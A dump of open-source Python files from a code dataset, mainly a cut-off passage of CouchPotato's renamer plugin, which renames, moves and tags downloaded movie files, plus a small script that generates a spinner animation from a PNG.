return render(request, 'viz/index_computing.dtl')
def test(request):
return render(request, 'viz/index_test.dtl')
| mit |
Jutarul/ppcoin-tournament | src/share/qt/make_spinner.py | 4415 | 1035 | #!/usr/bin/env python
# W.J. van der Laan, 2011
# Make spinning .mng animation from a .png
# Requires imagemagick 6.7+
from __future__ import division
from os import path
from PIL import Image
from subprocess import Popen
SRC='img/reload_scaled.png'
DST='../../src/qt/res/movies/update_spinner.mng'
TMPDIR='/tmp'
TMPNAME='tmp-%03i.png'
NUMFRAMES=35
FRAMERATE=10.0
CONVERT='convert'
CLOCKWISE=True
DSIZE=(16,16)
im_src = Image.open(SRC)
if CLOCKWISE:
im_src = im_src.transpose(Image.FLIP_LEFT_RIGHT)
def frame_to_filename(frame):
return path.join(TMPDIR, TMPNAME % frame)
frame_files = []
for frame in xrange(NUMFRAMES):
rotation = (frame + 0.5) / NUMFRAMES * 360.0
if CLOCKWISE:
rotation = -rotation
im_new = im_src.rotate(rotation, Image.BICUBIC)
im_new.thumbnail(DSIZE, Image.ANTIALIAS)
outfile = frame_to_filename(frame)
im_new.save(outfile, 'png')
frame_files.append(outfile)
p = Popen([CONVERT, "-delay", str(FRAMERATE), "-dispose", "2"] + frame_files + [DST])
p.communicate()
| mit |
jymannob/CouchPotatoServer | couchpotato/core/plugins/renamer.py | 4 | 69077 | import fnmatch
import os
import re
import shutil
import time
import traceback
from couchpotato import get_db
from couchpotato.api import addApiView
from couchpotato.core.event import addEvent, fireEvent, fireEventAsync
from couchpotato.core.helpers.encoding import toUnicode, ss, sp
from couchpotato.core.helpers.variable import getExt, mergeDicts, getTitle, \
getImdb, link, symlink, tryInt, splitString, fnEscape, isSubFolder, getIdentifier
from couchpotato.core.logger import CPLog
from couchpotato.core.plugins.base import Plugin
from couchpotato.environment import Env
from unrar2 import RarFile
import six
from six.moves import filter
log = CPLog(__name__)
autoload = 'Renamer'
class Renamer(Plugin):
renaming_started = False
checking_snatched = False
def __init__(self):
addApiView('renamer.scan', self.scanView, docs = {
'desc': 'For the renamer to check for new files to rename in a folder',
'params': {
'async': {'desc': 'Optional: Set to 1 if you dont want to fire the renamer.scan asynchronous.'},
'media_folder': {'desc': 'Optional: The folder of the media to scan. Keep empty for default renamer folder.'},
'files': {'desc': 'Optional: Provide the release files if more releases are in the same media_folder, delimited with a \'|\'. Note that no dedicated release folder is expected for releases with one file.'},
'base_folder': {'desc': 'Optional: The folder to find releases in. Leave empty for default folder.'},
'downloader': {'desc': 'Optional: The downloader the release has been downloaded with. \'download_id\' is required with this option.'},
'download_id': {'desc': 'Optional: The nzb/torrent ID of the release in media_folder. \'downloader\' is required with this option.'},
'status': {'desc': 'Optional: The status of the release: \'completed\' (default) or \'seeding\''},
},
})
addEvent('renamer.scan', self.scan)
addEvent('renamer.check_snatched', self.checkSnatched)
addEvent('app.load', self.scan)
addEvent('app.load', self.setCrons)
# Enable / disable interval
addEvent('setting.save.renamer.enabled.after', self.setCrons)
addEvent('setting.save.renamer.run_every.after', self.setCrons)
addEvent('setting.save.renamer.force_every.after', self.setCrons)
def setCrons(self):
fireEvent('schedule.remove', 'renamer.check_snatched')
if self.isEnabled() and self.conf('run_every') > 0:
fireEvent('schedule.interval', 'renamer.check_snatched', self.checkSnatched, minutes = self.conf('run_every'), single = True)
fireEvent('schedule.remove', 'renamer.check_snatched_forced')
if self.isEnabled() and self.conf('force_every') > 0:
fireEvent('schedule.interval', 'renamer.check_snatched_forced', self.scan, hours = self.conf('force_every'), single = True)
return True
def scanView(self, **kwargs):
async = tryInt(kwargs.get('async', 0))
base_folder = kwargs.get('base_folder')
media_folder = sp(kwargs.get('media_folder'))
# Backwards compatibility, to be removed after a few versions :)
if not media_folder:
media_folder = sp(kwargs.get('movie_folder'))
downloader = kwargs.get('downloader')
download_id = kwargs.get('download_id')
files = [sp(filename) for filename in splitString(kwargs.get('files'), '|')]
status = kwargs.get('status', 'completed')
release_download = None
if not base_folder and media_folder:
release_download = {'folder': media_folder}
if download_id:
release_download.update({
'id': download_id,
'downloader': downloader,
'status': status,
'files': files
})
fire_handle = fireEvent if not async else fireEventAsync
fire_handle('renamer.scan', base_folder = base_folder, release_download = release_download)
return {
'success': True
}
def scan(self, base_folder = None, release_download = None):
if not release_download: release_download = {}
if self.isDisabled():
return
if self.renaming_started is True:
log.info('Renamer is already running, if you see this often, check the logs above for errors.')
return
if not base_folder:
base_folder = sp(self.conf('from'))
from_folder = sp(self.conf('from'))
to_folder = sp(self.conf('to'))
# Get media folder to process
media_folder = sp(release_download.get('folder'))
# Get all folders that should not be processed
no_process = [to_folder]
cat_list = fireEvent('category.all', single = True) or []
no_process.extend([item['destination'] for item in cat_list])
try:
if Env.setting('library', section = 'manage').strip():
no_process.extend([sp(manage_folder) for manage_folder in splitString(Env.setting('library', section = 'manage'), '::')])
except:
pass
# Check to see if the no_process folders are inside the "from" folder.
if not os.path.isdir(base_folder) or not os.path.isdir(to_folder):
log.error('Both the "To" and "From" folder have to exist.')
return
else:
for item in no_process:
if isSubFolder(item, base_folder):
log.error('To protect your data, the media libraries can\'t be inside of or the same as the "from" folder. "%s" in "%s"', (item, base_folder))
return
# Check to see if the no_process folders are inside the provided media_folder
if media_folder and not os.path.isdir(media_folder):
log.debug('The provided media folder %s does not exist. Trying to find it in the \'from\' folder.', media_folder)
# Update to the from folder
if len(release_download.get('files', [])) == 1:
new_media_folder = sp(from_folder)
else:
new_media_folder = sp(os.path.join(from_folder, os.path.basename(media_folder)))
if not os.path.isdir(new_media_folder):
log.error('The provided media folder %s does not exist and could also not be found in the \'from\' folder.', media_folder)
return
# Update the files
new_files = [os.path.join(new_media_folder, os.path.relpath(filename, media_folder)) for filename in release_download.get('files', [])]
if new_files and not os.path.isfile(new_files[0]):
log.error('The provided media folder %s does not exist and its files could also not be found in the \'from\' folder.', media_folder)
return
# Update release_download info to the from folder
log.debug('Release %s found in the \'from\' folder.', media_folder)
release_download['folder'] = new_media_folder
release_download['files'] = new_files
media_folder = new_media_folder
if media_folder:
for item in no_process:
if isSubFolder(item, media_folder):
log.error('To protect your data, the media libraries can\'t be inside of or the same as the provided media folder. "%s" in "%s"', (item, media_folder))
return
# Make sure a checkSnatched marked all downloads/seeds as such
if not release_download and self.conf('run_every') > 0:
self.checkSnatched(fire_scan = False)
self.renaming_started = True
# make sure the media folder name is included in the search
folder = None
files = []
if media_folder:
log.info('Scanning media folder %s...', media_folder)
folder = os.path.dirname(media_folder)
release_files = release_download.get('files', [])
if release_files:
files = release_files
# If there is only one file in the torrent, the downloader did not create a subfolder
if len(release_files) == 1:
folder = media_folder
else:
# Get all files from the specified folder
try:
for root, folders, names in os.walk(media_folder):
files.extend([sp(os.path.join(root, name)) for name in names])
except:
log.error('Failed getting files from %s: %s', (media_folder, traceback.format_exc()))
db = get_db()
# Extend the download info with info stored in the downloaded release
keep_original = self.moveTypeIsLinked()
is_torrent = False
if release_download:
release_download = self.extendReleaseDownload(release_download)
is_torrent = self.downloadIsTorrent(release_download)
keep_original = True if is_torrent and self.conf('file_action') not in ['move'] else keep_original
# Unpack any archives
extr_files = None
if self.conf('unrar'):
folder, media_folder, files, extr_files = self.extractFiles(folder = folder, media_folder = media_folder, files = files,
cleanup = self.conf('cleanup') and not keep_original)
groups = fireEvent('scanner.scan', folder = folder if folder else base_folder,
files = files, release_download = release_download, return_ignored = False, single = True) or []
folder_name = self.conf('folder_name')
file_name = self.conf('file_name')
trailer_name = self.conf('trailer_name')
nfo_name = self.conf('nfo_name')
separator = self.conf('separator')
# Tag release folder as failed_rename in case no groups were found. This prevents check_snatched from removing the release from the downloader.
if not groups and self.statusInfoComplete(release_download):
self.tagRelease(release_download = release_download, tag = 'failed_rename')
for group_identifier in groups:
group = groups[group_identifier]
group['release_download'] = None
rename_files = {}
remove_files = []
remove_releases = []
media_title = getTitle(group)
# Add _UNKNOWN_ if no library item is connected
if not group.get('media') or not media_title:
self.tagRelease(group = group, tag = 'unknown')
continue
# Rename the files using the library data
else:
# Media not in library, add it first
if not group['media'].get('_id'):
group['media'] = fireEvent('movie.add', params = {
'identifier': group['identifier'],
'profile_id': None
}, search_after = False, status = 'done', single = True)
else:
group['media'] = fireEvent('movie.update_info', media_id = group['media'].get('_id'), single = True)
if not group['media'] or not group['media'].get('_id'):
log.error('Could not rename, no library item to work with: %s', group_identifier)
continue
media = group['media']
media_title = getTitle(media)
# Overwrite destination when set in category
destination = to_folder
category_label = ''
if media.get('category_id') and media.get('category_id') != '-1':
try:
category = db.get('id', media['category_id'])
category_label = category['label']
if category['destination'] and len(category['destination']) > 0 and category['destination'] != 'None':
destination = category['destination']
log.debug('Setting category destination for "%s": %s' % (media_title, destination))
else:
log.debug('No category destination found for "%s"' % media_title)
except:
log.error('Failed getting category label: %s', traceback.format_exc())
# Overwrite destination when set in 3D
destination = to_folder
test3D = group['meta_data']['quality'].get('is_3d', 0)
if test3D :
if self.conf('to if 3d') and len(self.conf('to if 3d')) > 0 and self.conf('to if 3d') != 'None':
destination = self.conf('to if 3d')
log.debug('Setting 3D destination for "%s": %s' % (media_title, destination))
else:
log.debug('No 3D folder set')
if self.conf('folder_name_3d') and len(self.conf('folder_name_3d')) > 0 and self.conf('folder_name_3d') != 'None':
folder_name = self.conf('folder_name_3d')
log.debug('Setting 3D folder pattern for "%s": %s' % (media_title, folder_name))
else:
log.debug('No 3D folder pattern set')
if self.conf('file_name_3d') and len(self.conf('file_name_3d')) > 0 and self.conf('file_name_3d') != 'None':
file_name = self.conf('file_name_3d')
log.debug('Setting 3D file pattern for "%s": %s' % (media_title, file_name))
else:
log.debug('No 3D file pattern set')
# Find subtitle for renaming
group['before_rename'] = []
fireEvent('renamer.before', group)
# Add extracted files to the before_rename list
if extr_files:
group['before_rename'].extend(extr_files)
# Remove weird chars from movie name
movie_name = re.sub(r"[\x00\/\\:\*\?\"<>\|]", '', media_title)
# Put 'The' at the end
name_the = movie_name
for prefix in ['the ', 'an ', 'a ']:
if prefix == movie_name[:len(prefix)].lower():
name_the = movie_name[len(prefix):] + ', ' + prefix.strip().capitalize()
break
replacements = {
'ext': 'mkv',
'namethe': name_the.strip(),
'thename': movie_name.strip(),
'year': media['info']['year'],
'first': name_the[0].upper(),
'quality': group['meta_data']['quality']['label'],
'quality_type': group['meta_data']['quality_type'],
'video': group['meta_data'].get('video'),
'audio': group['meta_data'].get('audio'),
'group': group['meta_data']['group'],
'source': group['meta_data']['source'],
'resolution_width': group['meta_data'].get('resolution_width'),
'resolution_height': group['meta_data'].get('resolution_height'),
'audio_channels': group['meta_data'].get('audio_channels'),
'imdb_id': group['identifier'],
'cd': '',
'cd_nr': '',
'mpaa': media['info'].get('mpaa', ''),
'mpaa_only': media['info'].get('mpaa', ''),
'category': category_label,
'3d': '3D' if group['meta_data']['quality'].get('is_3d', 0) else '',
'3d_type': group['meta_data'].get('3d_type'),
}
if replacements['mpaa_only'] not in ('G', 'PG', 'PG-13', 'R', 'NC-17'):
replacements['mpaa_only'] = 'Not Rated'
for file_type in group['files']:
# Move nfo depending on settings
if file_type is 'nfo' and not self.conf('rename_nfo'):
log.debug('Skipping, renaming of %s disabled', file_type)
for current_file in group['files'][file_type]:
if self.conf('cleanup') and (not keep_original or self.fileIsAdded(current_file, group)):
remove_files.append(current_file)
continue
# Subtitle extra
if file_type is 'subtitle_extra':
continue
# Move other files
multiple = len(group['files'][file_type]) > 1 and not group['is_dvd']
cd = 1 if multiple else 0
for current_file in sorted(list(group['files'][file_type])):
current_file = sp(current_file)
# Original filename
replacements['original'] = os.path.splitext(os.path.basename(current_file))[0]
replacements['original_folder'] = fireEvent('scanner.remove_cptag', group['dirname'], single = True)
# Extension
replacements['ext'] = getExt(current_file)
# cd #
replacements['cd'] = ' cd%d' % cd if multiple else ''
replacements['cd_nr'] = cd if multiple else ''
# Naming
final_folder_name = self.doReplace(folder_name, replacements, folder = True)
final_file_name = self.doReplace(file_name, replacements)
replacements['filename'] = final_file_name[:-(len(getExt(final_file_name)) + 1)]
# Meta naming
if file_type is 'trailer':
final_file_name = self.doReplace(trailer_name, replacements, remove_multiple = True)
elif file_type is 'nfo':
final_file_name = self.doReplace(nfo_name, replacements, remove_multiple = True)
# Seperator replace
if separator:
final_file_name = final_file_name.replace(' ', separator)
# Move DVD files (no structure renaming)
if group['is_dvd'] and file_type is 'movie':
found = False
for top_dir in ['video_ts', 'audio_ts', 'bdmv', 'certificate']:
has_string = current_file.lower().find(os.path.sep + top_dir + os.path.sep)
if has_string >= 0:
structure_dir = current_file[has_string:].lstrip(os.path.sep)
rename_files[current_file] = os.path.join(destination, final_folder_name, structure_dir)
found = True
break
if not found:
log.error('Could not determine dvd structure for: %s', current_file)
# Do rename others
else:
if file_type is 'leftover':
if self.conf('move_leftover'):
rename_files[current_file] = os.path.join(destination, final_folder_name, os.path.basename(current_file))
elif file_type not in ['subtitle']:
rename_files[current_file] = os.path.join(destination, final_folder_name, final_file_name)
# Check for extra subtitle files
if file_type is 'subtitle':
remove_multiple = False
if len(group['files']['movie']) == 1:
remove_multiple = True
sub_langs = group['subtitle_language'].get(current_file, [])
# rename subtitles with or without language
sub_name = self.doReplace(file_name, replacements, remove_multiple = remove_multiple)
rename_files[current_file] = os.path.join(destination, final_folder_name, sub_name)
rename_extras = self.getRenameExtras(
extra_type = 'subtitle_extra',
replacements = replacements,
folder_name = folder_name,
file_name = file_name,
destination = destination,
group = group,
current_file = current_file,
remove_multiple = remove_multiple,
)
# Don't add language if multiple languages in 1 subtitle file
if len(sub_langs) == 1:
sub_suffix = '%s.%s' % (sub_langs[0], replacements['ext'])
# Don't add language to subtitle file it it's already there
if not sub_name.endswith(sub_suffix):
sub_name = sub_name.replace(replacements['ext'], sub_suffix)
rename_files[current_file] = os.path.join(destination, final_folder_name, sub_name)
rename_files = mergeDicts(rename_files, rename_extras)
# Filename without cd etc
elif file_type is 'movie':
rename_extras = self.getRenameExtras(
extra_type = 'movie_extra',
replacements = replacements,
folder_name = folder_name,
file_name = file_name,
destination = destination,
group = group,
current_file = current_file
)
rename_files = mergeDicts(rename_files, rename_extras)
group['filename'] = self.doReplace(file_name, replacements, remove_multiple = True)[:-(len(getExt(final_file_name)) + 1)]
group['destination_dir'] = os.path.join(destination, final_folder_name)
if multiple:
cd += 1
# Before renaming, remove the lower quality files
remove_leftovers = True
# Get media quality profile
profile = None
if media.get('profile_id'):
try:
profile = db.get('id', media['profile_id'])
except:
# Set profile to None as it does not exist anymore
mdia = db.get('id', media['_id'])
mdia['profile_id'] = None
db.update(mdia)
log.error('Error getting quality profile for %s: %s', (media_title, traceback.format_exc()))
else:
log.debug('Media has no quality profile: %s', media_title)
# Mark media for dashboard
mark_as_recent = False
# Go over current movie releases
for release in fireEvent('release.for_media', media['_id'], single = True):
# When a release already exists
if release.get('status') == 'done':
# This is where CP removes older, lesser quality releases or releases that are not wanted anymore
is_higher = fireEvent('quality.ishigher', \
group['meta_data']['quality'], {'identifier': release['quality'], 'is_3d': release.get('is_3d', False)}, profile, single = True)
if is_higher == 'higher':
log.info('Removing lesser or not wanted quality %s for %s.', (media_title, release.get('quality')))
for file_type in release.get('files', {}):
for release_file in release['files'][file_type]:
remove_files.append(release_file)
remove_releases.append(release)
# Same quality, but still downloaded, so maybe repack/proper/unrated/directors cut etc
elif is_higher == 'equal':
log.info('Same quality release already exists for %s, with quality %s. Assuming repack.', (media_title, release.get('quality')))
for file_type in release.get('files', {}):
for release_file in release['files'][file_type]:
remove_files.append(release_file)
remove_releases.append(release)
# Downloaded a lower quality, rename the newly downloaded files/folder to exclude them from scan
else:
log.info('Better quality release already exists for %s, with quality %s', (media_title, release.get('quality')))
# Add exists tag to the .ignore file
self.tagRelease(group = group, tag = 'exists')
# Notify on rename fail
download_message = 'Renaming of %s (%s) cancelled, exists in %s already.' % (media_title, group['meta_data']['quality']['label'], release.get('quality'))
fireEvent('movie.renaming.canceled', message = download_message, data = group)
remove_leftovers = False
break
elif release.get('status') in ['snatched', 'seeding']:
if release_download and release_download.get('release_id'):
if release_download['release_id'] == release['_id']:
if release_download['status'] == 'completed':
# Set the release to downloaded
fireEvent('release.update_status', release['_id'], status = 'downloaded', single = True)
group['release_download'] = release_download
mark_as_recent = True
elif release_download['status'] == 'seeding':
# Set the release to seeding
fireEvent('release.update_status', release['_id'], status = 'seeding', single = True)
mark_as_recent = True
elif release.get('quality') == group['meta_data']['quality']['identifier']:
# Set the release to downloaded
fireEvent('release.update_status', release['_id'], status = 'downloaded', single = True)
group['release_download'] = release_download
mark_as_recent = True
# Mark media for dashboard
if mark_as_recent:
fireEvent('media.tag', group['media'].get('_id'), 'recent', update_edited = True, single = True)
# Remove leftover files
if not remove_leftovers: # Don't remove anything
break
log.debug('Removing leftover files')
for current_file in group['files']['leftover']:
if self.conf('cleanup') and not self.conf('move_leftover') and \
(not keep_original or self.fileIsAdded(current_file, group)):
remove_files.append(current_file)
# Remove files
delete_folders = []
for src in remove_files:
if rename_files.get(src):
log.debug('Not removing file that will be renamed: %s', src)
continue
log.info('Removing "%s"', src)
try:
src = sp(src)
if os.path.isfile(src):
os.remove(src)
parent_dir = os.path.dirname(src)
if delete_folders.count(parent_dir) == 0 and os.path.isdir(parent_dir) and \
not isSubFolder(destination, parent_dir) and not isSubFolder(media_folder, parent_dir) and \
not isSubFolder(parent_dir, base_folder):
delete_folders.append(parent_dir)
except:
log.error('Failed removing %s: %s', (src, traceback.format_exc()))
self.tagRelease(group = group, tag = 'failed_remove')
# Delete leftover folder from older releases
for delete_folder in delete_folders:
try:
self.deleteEmptyFolder(delete_folder, show_error = False)
except Exception as e:
log.error('Failed to delete folder: %s %s', (e, traceback.format_exc()))
# Rename all files marked
group['renamed_files'] = []
failed_rename = False
for src in rename_files:
if rename_files[src]:
dst = rename_files[src]
log.info('Renaming "%s" to "%s"', (src, dst))
# Create dir
self.makeDir(os.path.dirname(dst))
try:
self.moveFile(src, dst, use_default = not is_torrent or self.fileIsAdded(src, group))
group['renamed_files'].append(dst)
except:
log.error('Failed renaming the file "%s" : %s', (os.path.basename(src), traceback.format_exc()))
failed_rename = True
break
# If renaming failed tag the release folder as failed and continue with next group. Note that all old files have already been deleted.
if failed_rename:
self.tagRelease(group = group, tag = 'failed_rename')
continue
# If renaming succeeded, make sure it is not tagged as failed (scanner didn't return a group, but a download_ID was provided in an earlier attempt)
else:
self.untagRelease(group = group, tag = 'failed_rename')
# Tag folder if it is in the 'from' folder and it will not be removed because it is a torrent
if self.movieInFromFolder(media_folder) and keep_original:
self.tagRelease(group = group, tag = 'renamed_already')
# Remove matching releases
for release in remove_releases:
log.debug('Removing release %s', release.get('identifier'))
try:
db.delete(release)
except:
log.error('Failed removing %s: %s', (release, traceback.format_exc()))
if group['dirname'] and group['parentdir'] and not keep_original:
if media_folder:
# Delete the movie folder
group_folder = media_folder
else:
# Delete the first empty subfolder in the tree relative to the 'from' folder
group_folder = sp(os.path.join(base_folder, os.path.relpath(group['parentdir'], base_folder).split(os.path.sep)[0]))
try:
log.info('Deleting folder: %s', group_folder)
self.deleteEmptyFolder(group_folder)
except:
log.error('Failed removing %s: %s', (group_folder, traceback.format_exc()))
# Notify on download, search for trailers etc
download_message = 'Downloaded %s (%s%s)' % (media_title, replacements['quality'], (' ' + replacements['3d']) if replacements['3d'] else '')
try:
fireEvent('renamer.after', message = download_message, group = group, in_order = True)
except:
log.error('Failed firing (some) of the renamer.after events: %s', traceback.format_exc())
# Break if CP wants to shut down
if self.shuttingDown():
break
self.renaming_started = False
def getRenameExtras(self, extra_type = '', replacements = None, folder_name = '', file_name = '', destination = '', group = None, current_file = '', remove_multiple = False):
if not group: group = {}
if not replacements: replacements = {}
replacements = replacements.copy()
rename_files = {}
def test(s):
return current_file[:-len(replacements['ext'])] in sp(s)
for extra in set(filter(test, group['files'][extra_type])):
replacements['ext'] = getExt(extra)
final_folder_name = self.doReplace(folder_name, replacements, remove_multiple = remove_multiple, folder = True)
final_file_name = self.doReplace(file_name, replacements, remove_multiple = remove_multiple)
rename_files[extra] = os.path.join(destination, final_folder_name, final_file_name)
return rename_files
# This adds a file to ignore / tag a release so it is ignored later
def tagRelease(self, tag, group = None, release_download = None):
if not tag:
return
text = """This file is from CouchPotato
It has marked this release as "%s"
This file hides the release from the renamer
Remove it if you want it to be renamed (again, or at least let it try again)
""" % tag
tag_files = []
# Tag movie files if they are known
if isinstance(group, dict):
tag_files = [sorted(list(group['files']['movie']))[0]]
elif isinstance(release_download, dict):
# Tag download_files if they are known
if release_download.get('files', []):
tag_files = [filename for filename in release_download.get('files', []) if os.path.exists(filename)]
# Tag all files in release folder
elif release_download['folder']:
for root, folders, names in os.walk(sp(release_download['folder'])):
tag_files.extend([os.path.join(root, name) for name in names])
for filename in tag_files:
# Don't tag .ignore files
if os.path.splitext(filename)[1] == '.ignore':
continue
tag_filename = '%s.%s.ignore' % (os.path.splitext(filename)[0], tag)
if not os.path.isfile(tag_filename):
self.createFile(tag_filename, text)
def untagRelease(self, group = None, release_download = None, tag = ''):
if not release_download:
return
tag_files = []
folder = None
# Tag movie files if they are known
if isinstance(group, dict):
tag_files = [sorted(list(group['files']['movie']))[0]]
folder = sp(group['parentdir'])
if not group.get('dirname') or not os.path.isdir(folder):
return False
elif isinstance(release_download, dict):
folder = sp(release_download['folder'])
if not os.path.isdir(folder):
return False
# Untag download_files if they are known
if release_download.get('files'):
tag_files = release_download.get('files', [])
# Untag all files in release folder
else:
for root, folders, names in os.walk(folder):
tag_files.extend([sp(os.path.join(root, name)) for name in names if not os.path.splitext(name)[1] == '.ignore'])
if not folder:
return False
# Find all .ignore files in folder
ignore_files = []
for root, dirnames, filenames in os.walk(folder):
ignore_files.extend(fnmatch.filter([sp(os.path.join(root, filename)) for filename in filenames], '*%s.ignore' % tag))
# Match all found ignore files with the tag_files and delete if found
for tag_file in tag_files:
ignore_file = fnmatch.filter(ignore_files, fnEscape('%s.%s.ignore' % (os.path.splitext(tag_file)[0], tag if tag else '*')))
for filename in ignore_file:
try:
os.remove(filename)
except:
log.debug('Unable to remove ignore file: %s. Error: %s.' % (filename, traceback.format_exc()))
def hastagRelease(self, release_download, tag = ''):
if not release_download:
return False
folder = sp(release_download['folder'])
if not os.path.isdir(folder):
return False
tag_files = []
ignore_files = []
# Find tag on download_files if they are known
if release_download.get('files'):
tag_files = release_download.get('files', [])
# Find tag on all files in release folder
else:
for root, folders, names in os.walk(folder):
tag_files.extend([sp(os.path.join(root, name)) for name in names if not os.path.splitext(name)[1] == '.ignore'])
# Find all .ignore files in folder
for root, dirnames, filenames in os.walk(folder):
ignore_files.extend(fnmatch.filter([sp(os.path.join(root, filename)) for filename in filenames], '*%s.ignore' % tag))
# Match all found ignore files with the tag_files and return True found
for tag_file in tag_files:
ignore_file = fnmatch.filter(ignore_files, fnEscape('%s.%s.ignore' % (os.path.splitext(tag_file)[0], tag if tag else '*')))
if ignore_file:
return True
return False
def moveFile(self, old, dest, use_default = False):
dest = sp(dest)
try:
move_type = self.conf('file_action')
if use_default:
move_type = self.conf('default_file_action')
if move_type not in ['copy', 'link']:
try:
shutil.move(old, dest)
except:
if os.path.exists(dest):
log.error('Successfully moved file "%s", but something went wrong: %s', (dest, traceback.format_exc()))
os.unlink(old)
else:
raise
elif move_type == 'copy':
shutil.copy(old, dest)
else:
# First try to hardlink
try:
log.debug('Hardlinking file "%s" to "%s"...', (old, dest))
link(old, dest)
except:
# Try to simlink next
log.debug('Couldn\'t hardlink file "%s" to "%s". Symlinking instead. Error: %s.', (old, dest, traceback.format_exc()))
shutil.copy(old, dest)
try:
symlink(dest, old + '.link')
os.unlink(old)
os.rename(old + '.link', old)
except:
log.error('Couldn\'t symlink file "%s" to "%s". Copied instead. Error: %s. ', (old, dest, traceback.format_exc()))
try:
os.chmod(dest, Env.getPermission('file'))
if os.name == 'nt' and self.conf('ntfs_permission'):
os.popen('icacls "' + dest + '"* /reset /T')
except:
log.debug('Failed setting permissions for file: %s, %s', (dest, traceback.format_exc(1)))
except:
log.error('Couldn\'t move file "%s" to "%s": %s', (old, dest, traceback.format_exc()))
raise
return True
def doReplace(self, string, replacements, remove_multiple = False, folder = False):
"""
replace confignames with the real thing
"""
replacements = replacements.copy()
if remove_multiple:
replacements['cd'] = ''
replacements['cd_nr'] = ''
replaced = toUnicode(string)
for x, r in replacements.items():
if x in ['thename', 'namethe']:
continue
if r is not None:
replaced = replaced.replace(six.u('<%s>') % toUnicode(x), toUnicode(r))
else:
#If information is not available, we don't want the tag in the filename
replaced = replaced.replace('<' + x + '>', '')
replaced = self.replaceDoubles(replaced.lstrip('. '))
for x, r in replacements.items():
if x in ['thename', 'namethe']:
replaced = replaced.replace(six.u('<%s>') % toUnicode(x), toUnicode(r))
replaced = re.sub(r"[\x00:\*\?\"<>\|]", '', replaced)
sep = self.conf('foldersep') if folder else self.conf('separator')
return replaced.replace(' ', ' ' if not sep else sep)
def replaceDoubles(self, string):
replaces = [
('\.+', '.'), ('_+', '_'), ('-+', '-'), ('\s+', ' '), (' \\\\', '\\\\'), (' /', '/'),
('(\s\.)+', '.'), ('(-\.)+', '.'), ('(\s-)+', '-'),
]
for r in replaces:
reg, replace_with = r
string = re.sub(reg, replace_with, string)
return string
def checkSnatched(self, fire_scan = True):
if self.checking_snatched:
log.debug('Already checking snatched')
return False
self.checking_snatched = True
try:
db = get_db()
rels = list(fireEvent('release.with_status', ['snatched', 'seeding', 'missing'], single = True))
if not rels:
#No releases found that need status checking
self.checking_snatched = False
return True
# Collect all download information with the download IDs from the releases
download_ids = []
no_status_support = []
try:
for rel in rels:
if not rel.get('download_info'): continue
if rel['download_info'].get('id') and rel['download_info'].get('downloader'):
download_ids.append(rel['download_info'])
ds = rel['download_info'].get('status_support')
if ds is False or ds == 'False':
no_status_support.append(ss(rel['download_info'].get('downloader')))
except:
log.error('Error getting download IDs from database')
self.checking_snatched = False
return False
release_downloads = fireEvent('download.status', download_ids, merge = True) if download_ids else []
if len(no_status_support) > 0:
log.debug('Download status functionality is not implemented for one of the active downloaders: %s', list(set(no_status_support)))
if not release_downloads:
if fire_scan:
self.scan()
self.checking_snatched = False
return True
scan_releases = []
scan_required = False
log.debug('Checking status snatched releases...')
try:
for rel in rels:
movie_dict = db.get('id', rel.get('media_id'))
download_info = rel.get('download_info')
if not isinstance(download_info, dict):
log.error('Faulty release found without any info, ignoring.')
fireEvent('release.update_status', rel.get('_id'), status = 'ignored', single = True)
continue
# Check if download ID is available
if not download_info.get('id') or not download_info.get('downloader'):
log.debug('Download status functionality is not implemented for downloader (%s) of release %s.', (download_info.get('downloader', 'unknown'), rel['info']['name']))
scan_required = True
# Continue with next release
continue
# Find release in downloaders
nzbname = self.createNzbName(rel['info'], movie_dict)
found_release = False
for release_download in release_downloads:
found_release = False
if download_info.get('id'):
if release_download['id'] == download_info['id'] and release_download['downloader'] == download_info['downloader']:
log.debug('Found release by id: %s', release_download['id'])
found_release = True
break
else:
if release_download['name'] == nzbname or rel['info']['name'] in release_download['name'] or getImdb(release_download['name']) == getIdentifier(movie_dict):
log.debug('Found release by release name or imdb ID: %s', release_download['name'])
found_release = True
break
if not found_release:
log.info('%s not found in downloaders', nzbname)
#Check status if already missing and for how long, if > 1 week, set to ignored else to missing
if rel.get('status') == 'missing':
if rel.get('last_edit') < int(time.time()) - 7 * 24 * 60 * 60:
fireEvent('release.update_status', rel.get('_id'), status = 'ignored', single = True)
else:
# Set the release to missing
fireEvent('release.update_status', rel.get('_id'), status = 'missing', single = True)
# Continue with next release
continue
# Log that we found the release
timeleft = 'N/A' if release_download['timeleft'] == -1 else release_download['timeleft']
log.debug('Found %s: %s, time to go: %s', (release_download['name'], release_download['status'].upper(), timeleft))
# Check status of release
if release_download['status'] == 'busy':
# Set the release to snatched if it was missing before
fireEvent('release.update_status', rel.get('_id'), status = 'snatched', single = True)
# Tag folder if it is in the 'from' folder and it will not be processed because it is still downloading
if self.movieInFromFolder(release_download['folder']):
self.tagRelease(release_download = release_download, tag = 'downloading')
elif release_download['status'] == 'seeding':
#If linking setting is enabled, process release
if self.conf('file_action') != 'move' and not rel.get('status') == 'seeding' and self.statusInfoComplete(release_download):
log.info('Download of %s completed! It is now being processed while leaving the original files alone for seeding. Current ratio: %s.', (release_download['name'], release_download['seed_ratio']))
# Remove the downloading tag
self.untagRelease(release_download = release_download, tag = 'downloading')
# Scan and set the torrent to paused if required
release_download.update({'pause': True, 'scan': True, 'process_complete': False})
scan_releases.append(release_download)
else:
#let it seed
log.debug('%s is seeding with ratio: %s', (release_download['name'], release_download['seed_ratio']))
# Set the release to seeding
fireEvent('release.update_status', rel.get('_id'), status = 'seeding', single = True)
elif release_download['status'] == 'failed':
# Set the release to failed
fireEvent('release.update_status', rel.get('_id'), status = 'failed', single = True)
fireEvent('download.remove_failed', release_download, single = True)
if self.conf('next_on_failed'):
fireEvent('movie.searcher.try_next_release', media_id = rel.get('media_id'))
elif release_download['status'] == 'completed':
log.info('Download of %s completed!', release_download['name'])
#Make sure the downloader sent over a path to look in
if self.statusInfoComplete(release_download):
# If the release has been seeding, process now the seeding is done
if rel.get('status') == 'seeding':
if self.conf('file_action') != 'move':
# Set the release to done as the movie has already been renamed
fireEvent('release.update_status', rel.get('_id'), status = 'downloaded', single = True)
# Allow the downloader to clean-up
release_download.update({'pause': False, 'scan': False, 'process_complete': True})
scan_releases.append(release_download)
else:
# Scan and Allow the downloader to clean-up
release_download.update({'pause': False, 'scan': True, 'process_complete': True})
scan_releases.append(release_download)
else:
# Set the release to snatched if it was missing before
fireEvent('release.update_status', rel.get('_id'), status = 'snatched', single = True)
# Remove the downloading tag
self.untagRelease(release_download = release_download, tag = 'downloading')
# Scan and Allow the downloader to clean-up
